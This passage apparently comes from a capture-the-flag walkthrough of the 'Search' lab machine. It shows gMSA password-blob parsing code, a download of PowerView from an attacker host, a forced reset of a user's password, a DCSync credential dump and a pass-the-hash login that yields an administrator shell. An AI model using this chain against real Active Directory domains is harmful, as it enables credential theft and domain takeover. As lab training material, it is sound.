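    """Parse the blob the way gMSADumper / ConvertFrom-ADManagedPasswordBlob do."""
    version, _reserved, length, cur_off, prev_off, qpi_off, _upi_off = \
        struct.unpack_from("<HHIHHHH", blob, 0)
    if version != 1 or length != len(blob):
        raise ValueError("not a version-1 MSDS-MANAGEDPASSWORD_BLOB")

    def wstr(off):
        # The password is a null-terminated WCHAR string; scan for 00 00 on a 2-byte boundary.
        for i in range(off, len(blob) - 1, 2):
            if blob[i] == 0 and blob[i + 1] == 0:
                return blob[off:i]
        raise ValueError("unterminated password string")

    query_interval, unchanged_interval = struct.unpack_from("<QQ", blob, qpi_off)
    return {
        "current_password": wstr(cur_off),
        "previous_password": wstr(prev_off) if prev_off else b"",
        "query_password_interval": query_interval,
        "unchanged_password_interval": unchanged_interval,
    }


def gmsa_nt_hash(blob: bytes) -> str:
    """What gMSADumper prints: MD4 over the raw current-password bytes, terminator excluded."""
    return nt_hash_from_utf16(parse_managed_password_blob(blob)["current_password"])


if __name__ == "__main__":
    sample = build_managed_password_blob("S3cret-gMSA!".encode("utf-16-le"))
    print("BIR-ADFS-GMSA$:::" + gmsa_nt_hash(sample))  # sample blob, not the box's real hash
```

The hash is all that is needed for pass-the-hash with the gMSA account (e.g. with Impacket's -hashes), which is why the raw password bytes are never decoded to text: a real managed password is random binary that usually is not valid UTF-16.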

Force change password with GenericAll rights

# Fetch PowerView from the attacker host (10.10.14.11) and import it
Invoke-WebRequest -Uri "http://10.10.14.11/PowerView-ofs.ps1" -OutFile "C:\Users\Sierra.Frye\Documents\PowerView-ofs.ps1"
ipmo .\PowerView-ofs.ps1

# GenericAll on the user object includes the User-Force-Change-Password right, so the
# gMSA credential built above can reset Tristan.Davies's password without knowing the old one
$UserPassword = ConvertTo-SecureString 'Ilove4!' -AsPlainText -Force
Set-DomainUserPassword -Identity Tristan.Davies -AccountPassword $UserPassword -Credential $cred

DCSync attack

➤ secretsdump.py 'Tristan.Davies':'Ilove4!'@search.htb

Impacket v0.9.23 - Copyright 2021 SecureAuth Corporation

[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x697a8e5d7f1607bd69d577ff42336dd5
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:9c7bf72260e8eef29e9cfeb60f94fc56:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
...
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:5e3c0abbe0b4163c5612afe25c69ced6:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:cd69d23e4383daa5b0f42d29dba9529a:::
➤ wmiexec.py search.htb/'Administrator'@10.10.11.129 -hashes ':5e3c0abbe0b4163c5612afe25c69ced6'
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>whoami
search\administrator